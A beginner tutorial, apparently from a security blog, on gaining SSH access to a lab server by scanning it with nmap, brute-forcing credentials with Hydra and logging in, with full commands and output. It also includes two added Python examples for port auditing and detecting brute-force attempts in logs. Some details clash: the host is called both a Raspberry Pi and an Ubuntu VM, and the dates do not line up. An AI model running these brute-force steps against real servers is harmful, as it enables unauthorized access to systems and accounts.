Sploitech

How To Gain Server SSH Access Using Nmap & Hydra


Tools & Software Required:

  • One system capable of running Kali Linux. (You can also use virtual machines to perform the hack.)
  • One host machine of your own to be hacked. (I am using a Raspberry Pi 3 as the host machine.)
  • Nmap. (It is installed by default.)
  • Hydra. (It is installed by default.)

Gathering Information About The Host/Server:

I am using my own Ubuntu VM as a server. Please don’t do this to hack anyone without their permission.

Steps To Get The Information About The Host:

  • First, we are going to ping the server to check if it is up or not. Type:

    ping {Ip Address Of The Host}

You should see this type of message if the host is up:

    ┌──(kali㉿kali)-[~]
    └─$ ping 192.168.1.12
    PING 192.168.1.12 (192.168.1.12) 56(84) bytes of data.
    64 bytes from 192.168.1.12: icmp_seq=1 ttl=128 time=216 ms
    64 bytes from 192.168.1.12: icmp_seq=2 ttl=128 time=8.44 ms
    64 bytes from 192.168.1.12: icmp_seq=3 ttl=128 time=28.5 ms
    ^C
    --- 192.168.1.12 ping statistics ---
    4 packets transmitted, 3 received, 25% packet loss, time 3006ms
    rtt min/avg/max/mdev = 8.443/84.179/215.618/93.300 ms

Now that we know the host is up, we can proceed to scan for open ports on the server using Nmap.

Nmap is a free, open-source, and powerful tool used to discover hosts and services on a computer network. In our example, we are using Nmap to scan this machine and identify the service running on each open port. Nmap has many capabilities; the table below summarises some of the options it provides, which are worth learning before scanning the server for open ports.

    Option       Description
    -sV          Attempts to determine the version of the services running
    -p or -p-    Scans the given port, or scans all ports
    -Pn          Disables host discovery and just scans for open ports
    -A           Enables OS and version detection and executes built-in scripts for further enumeration
    -sC          Scans with the default Nmap scripts
    -v           Verbose mode
    -sU          UDP port scan
    -sS          TCP SYN port scan

There are many Nmap “cheatsheets” online that you can use too.

Now we are going to scan the server to find out which ports are open and which services are listening on them.

  • Type:

    nmap -sV {Ip Address Of The Host}

Now you have to wait for Nmap to complete the server scan. You can press enter to check the progress of the scan.

    ┌──(kali㉿kali)-[~]
    └─$ nmap -sV 192.168.1.12
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 13:24 EDT
    Nmap scan report for 192.168.1.12
    Host is up (0.12s latency).
    Not shown: 997 filtered ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 28.50 seconds

Port 21 is the FTP (File Transfer Protocol) port, which means files can be transferred to and from the server remotely.

Port 22 is the SSH (Secure Shell) port, which lets the server be controlled remotely. We will be focusing on port 22.
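The same scan output is useful on the defensive side for checking what a host exposes against what it is meant to expose. The following is an added example, not part of the original article: it parses the PORT table of an `nmap -sV` run and reports open ports that break a policy. The allow-list, the cleartext-service set and the function names are assumptions made for the illustration.

```python
import re

# Constructed sample: the PORT table of an `nmap -sV` run like the one above.
SCAN_OUTPUT = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
"""

# Assumptions for this example: the services this host is meant to expose,
# and the services that carry logins in cleartext.
ALLOWED = {(22, "tcp"), (80, "tcp")}
CLEARTEXT_LOGIN = {"ftp", "telnet"}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Turn the PORT/STATE/SERVICE/VERSION rows into dictionaries."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version})
    return rows


def audit(rows, allowed=ALLOWED):
    """Return (port, finding) pairs for open ports that break the policy."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        if (r["port"], r["proto"]) not in allowed:
            findings.append((r["port"], "not in allow-list"))
        if r["service"] in CLEARTEXT_LOGIN:
            findings.append((r["port"], "cleartext login"))
        if r["service"] == "ssh":
            findings.append((r["port"], "check password auth and rate limiting"))
    return findings


if __name__ == "__main__":
    for port, finding in audit(parse_ports(SCAN_OUTPUT)):
        print(port, finding)
```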

Brute Force Using Hydra:

We are using hydra because it supports parallel processing to brute-force the correct username and password combination.

Now that we know port 22 is open, we can use hydra to brute-force the username and password.

    hydra -L username.txt -P password.txt ssh://{Ip Address Of The Host} -t 4

    Option                 Description
    -l LOGIN or -L FILE    Log in with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE     Try password PASS, or load several passwords from FILE

  • Instead of username.txt, enter the path of your own file containing the usernames to be tried.
  • Instead of password.txt, enter the path of your own file containing the passwords to be tried.

If the attack succeeds, Hydra shows the username and password it found.

    ┌──(kali㉿kali)-[~]
    └─$ hydra -L /home/kali/name.txt -P /home/kali/password.txt ssh://192.168.1.12 -t 4
    Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-16 08:24:42
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 9 login tries (l:3/p:3), ~3 tries per task
    [DATA] attacking ssh://192.168.1.12:22/
    [22][ssh] host: 192.168.1.12   login: server   password: kali
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-16 08:24:46

Connecting to SSH:

Once you have the credentials of the server, you can easily connect over SSH:

    ┌──(kali㉿kali)-[~]
    └─$ ssh server@192.168.1.12
    server@192.168.1.12's password: 
    Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.11.0-25-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

    290 updates can be installed immediately.
    123 of these updates are security updates.
    To see these additional updates run: apt list --upgradable

    Your Hardware Enablement Stack (HWE) is supported until April 2025.
    Last login: Fri Aug 20 08:18:02 2021 from 192.168.1.8
    server@ubuntu:~$ uname -a
    Linux ubuntu 5.11.0-25-generic #27~20.04.1-Ubuntu SMP Tue Jul 13 17:41:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    server@ubuntu:~$ 

Conclusion

These types of attacks are not 100% successful. If you use them against a real server, a firewall could block your IP in no time. There are other ways to brute-force SSH, such as Nmap or Metasploit, but this is the easiest one if you are a beginner.
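A run like the Hydra session above leaves a burst of failed logins in the server's SSH log, which is what an automatic block keys on. The following is an added example, not part of the original article: it counts failed SSH password attempts per source address in a sliding window and raises a second, higher-priority alert when a login succeeds from an address that was just guessing. The log lines are constructed in the OpenSSH syslog format, and the threshold, window and function name are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in OpenSSH's syslog format (not captured from the lab above).
LOG = """\
Aug 16 08:20:10 ubuntu sshd[1990]: Failed password for alice from 192.168.1.20 port 40112 ssh2
Aug 16 08:20:18 ubuntu sshd[1990]: Accepted password for alice from 192.168.1.20 port 40112 ssh2
Aug 16 08:24:42 ubuntu sshd[2101]: Failed password for invalid user admin from 192.168.1.8 port 51230 ssh2
Aug 16 08:24:42 ubuntu sshd[2102]: Failed password for invalid user pi from 192.168.1.8 port 51232 ssh2
Aug 16 08:24:43 ubuntu sshd[2103]: Failed password for server from 192.168.1.8 port 51234 ssh2
Aug 16 08:24:44 ubuntu sshd[2104]: Failed password for server from 192.168.1.8 port 51236 ssh2
Aug 16 08:24:44 ubuntu sshd[2105]: Failed password for invalid user admin from 192.168.1.8 port 51238 ssh2
Aug 16 08:24:46 ubuntu sshd[2106]: Accepted password for server from 192.168.1.8 port 51240 ssh2
"""

EVENT = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) "
    r"password for (?:invalid user )?(\S+) from (\S+) port \d+")


def detect(log_text, threshold=5, window_s=60, year=2021):
    """Return alerts as (kind, source_ip, detail) tuples, in log order.

    threshold, window_s and year are assumptions for this example; syslog
    timestamps carry no year, so one has to be supplied.
    """
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # source IP -> times of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        stamp, outcome, user, src = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        failures = recent[src]
        while failures and ts - failures[0] > window:
            failures.popleft()  # drop failures that fell out of the window
        if outcome == "Failed":
            failures.append(ts)
            if len(failures) == threshold:
                alerts.append(("bruteforce", src, len(failures)))
        elif len(failures) >= threshold:
            # A success right after a burst of failures: likely guessed password.
            alerts.append(("compromise", src, user))
            failures.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect(LOG):
        print(alert)
```

The single mistyped password from 192.168.1.20 stays below the threshold, so only the burst from 192.168.1.8 and the login that follows it are reported.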
